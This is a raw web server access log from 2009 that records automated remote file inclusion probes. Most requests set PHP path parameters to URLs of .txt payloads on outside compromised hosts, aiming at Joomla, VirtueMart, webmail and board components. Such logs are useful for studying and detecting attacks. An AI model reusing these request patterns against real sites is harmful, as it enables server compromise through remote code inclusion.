211.189.18.73 - - [08/Sep/2009:07:40:11 -0500] "GET /logs/access_log.1242086400%22%20target=%22_blank/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
65.55.106.209 - - [08/Sep/2009:07:40:33 -0500] "GET /logs/access_log.1173052800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.189.18.73 - - [08/Sep/2009:07:40:54 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:07:40:54 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:07:40:54 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:07:40:54 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:07:40:57 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:07:40:57 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:07:40:57 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:07:40:57 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:07:41:17 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:07:41:17 -0500] "GET /?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:07:41:20 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:07:41:20 -0500] "GET /?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:07:41:20 -0500] "GET /logs/?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 204197 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:07:41:23 -0500] "GET /logs/errors.php?error=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:07:41:23 -0500] "GET /errors.php?error=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:07:41:23 -0500] "GET /logs/access_log.1236902400/errors.php?error=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:07:41:23 -0500] "GET /logs/access_log.1248134400/?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:07:41:29 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:07:41:29 -0500] "GET /?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:07:41:30 -0500] "GET /logs/?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 204197 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:07:41:35 -0500] "GET /logs/?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 204197 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:07:41:35 -0500] "GET /logs/access_log.1248134400/?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:07:41:45 -0500] "GET /logs/access_log.1248134400/?DOCUMENT_ROOT=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.150.247.202 - - [08/Sep/2009:07:42:01 -0500] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
59.150.247.202 - - [08/Sep/2009:07:42:01 -0500] "GET /logs/access_log.1244764800/?_SERVER%5BDOCUMENT_ROOT%5D=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.150.247.202 - - [08/Sep/2009:07:42:03 -0500] "GET /logs/?_SERVER%5BDOCUMENT_ROOT%5D=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 200 204197 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:07:43:59 -0500] "GET /logs/access_log.1244937600/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
66.90.115.6 - - [08/Sep/2009:07:44:38 -0500] "GET /logs/errors.php?error=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:07:44:38 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:07:44:38 -0500] "GET /errors.php?error=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:46:10 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:46:10 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:46:10 -0500] "GET /logs/access_log.1244764800//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:46:21 -0500] "GET /logs/access_log.1244764800//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:46:21 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:46:21 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:46:30 -0500] "GET /logs/access_log.1247097600//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.160 - - [08/Sep/2009:07:46:32 -0500] "GET /logs/access_log.1248739200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
117.110.59.2 - - [08/Sep/2009:07:46:46 -0500] "GET /logs/access_log.1247097600//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:14 -0500] "GET /logs/access_log.1245542400//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:14 -0500] "GET /logs/access_log.1248134400//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:14 -0500] "GET /logs/access_log.1239321600//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:14 -0500] "GET /logs/access_log.1244937600//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:14 -0500] "GET /logs/access_log.1240704000//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:15 -0500] "GET /logs/access_log.1241740800//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:41 -0500] "GET /logs/access_log.1245542400//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:41 -0500] "GET /logs/access_log.1240704000//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:41 -0500] "GET /logs/access_log.1248134400//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:41 -0500] "GET /logs/access_log.1239321600//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:41 -0500] "GET /logs/access_log.1244937600//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:47:41 -0500] "GET /logs/access_log.1241740800//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:28 -0500] "GET /logs/access_log.1242950400//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:28 -0500] "GET /logs/access_log.1240531200//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:29 -0500] "GET /logs/access_log.1240272000//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:29 -0500] "GET /logs/access_log.1243296000//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:29 -0500] "GET /logs/access_log.1245283200//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:29 -0500] "GET /logs/access_log.1242864000//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:29 -0500] "GET /logs/access_log.1243123200//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:07:48:42 -0500] "GET /?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:48:47 -0500] "GET /logs/?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 204197 "-""libwww-perl/5.803"
117.110.59.2 - - [08/Sep/2009:07:48:52 -0500] "GET /logs/access_log.1242950400//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:52 -0500] "GET /logs/access_log.1240272000//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:53 -0500] "GET /logs/access_log.1243123200//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:53 -0500] "GET /logs/access_log.1243296000//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:53 -0500] "GET /logs/access_log.1240531200//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [08/Sep/2009:07:48:53 -0500] "GET /logs/access_log.1245283200//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:07:48:53 -0500] "GET /?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
117.110.59.2 - - [08/Sep/2009:07:48:53 -0500] "GET /logs/access_log.1242864000//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:07:48:55 -0500] "GET /logs/?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 204197 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:49:16 -0500] "GET /?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:49:20 -0500] "GET /logs/?sourcedir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 200 204197 "-""libwww-perl/5.803"
218.38.136.251 - - [08/Sep/2009:07:49:47 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:07:49:47 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:07:50:02 -0500] "GET /logs/access_log.1247616000//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
61.106.21.38 - - [08/Sep/2009:07:50:18 -0500] "GET /logs//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.iglesia-bautista.org.co/temp/copyright.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
61.106.21.38 - - [08/Sep/2009:07:50:18 -0500] "GET /logs/access_log.1237075200//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.iglesia-bautista.org.co/temp/copyright.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
61.106.21.38 - - [08/Sep/2009:07:50:18 -0500] "GET //includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.iglesia-bautista.org.co/temp/copyright.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:07:50:28 -0500] "GET /logs/access_log.1235260800/errors.php?error=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:07:53:38 -0500] "GET /logs////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:53:38 -0500] "GET ////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:55:45 -0500] "GET ////skin/ggambo7002_board/str.php?page=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:55:45 -0500] "GET /logs////skin/ggambo7002_board/str.php?page=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:56:02 -0500] "GET ////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:56:02 -0500] "GET /logs////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
213.189.2.39 - - [08/Sep/2009:07:57:02 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.189.2.39 - - [08/Sep/2009:07:57:02 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.189.2.39 - - [08/Sep/2009:07:57:02 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.189.2.39 - - [08/Sep/2009:07:57:02 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.189.2.39 - - [08/Sep/2009:07:57:59 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.189.2.39 - - [08/Sep/2009:07:57:59 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:07:58:54 -0500] "GET ////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:58:54 -0500] "GET /logs////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
65.55.106.156 - - [08/Sep/2009:07:59:33 -0500] "GET /logs/access_log.1225238400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.136.37.141 - - [08/Sep/2009:07:59:47 -0500] "GET ////skin/ggambo7002_board/str.php?page=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:59:50 -0500] "GET /logs////skin/ggambo7002_board/str.php?page=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:59:58 -0500] "GET ////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:07:59:58 -0500] "GET /logs/access_log.1247443200////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:07:59:58 -0500] "GET /logs////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:08:00:43 -0500] "GET /logs////skin/ggambo7002_board/str.php?page=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:08:00:44 -0500] "GET ////skin/ggambo7002_board/str.php?page=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:08:01:44 -0500] "GET ////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:08:01:44 -0500] "GET /logs////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:08:01:44 -0500] "GET /logs/access_log.1247443200////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:08:02:37 -0500] "GET /logs/access_log.1247270400////skin/ggambo7002_board/str.php?page=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.125.74.87 - - [08/Sep/2009:08:04:09 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.125.74.87 - - [08/Sep/2009:08:04:09 -0500] "GET /logs/access_log.1246060800//?_SERVER[DOCUMENT_ROOT]=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.125.74.87 - - [08/Sep/2009:08:04:10 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 200 204202 "-""Mozilla/5.0"
121.125.74.87 - - [08/Sep/2009:08:04:35 -0500] "GET /logs/access_log.1242691200//?_SERVER[DOCUMENT_ROOT]=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
59.150.247.202 - - [08/Sep/2009:08:05:05 -0500] "GET /logs/access_log.1244764800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.150.247.202 - - [08/Sep/2009:08:05:05 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.150.247.202 - - [08/Sep/2009:08:05:05 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
58.150.109.161 - - [08/Sep/2009:08:05:58 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.150.109.161 - - [08/Sep/2009:08:05:58 -0500] "GET /logs/access_log.1236211200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
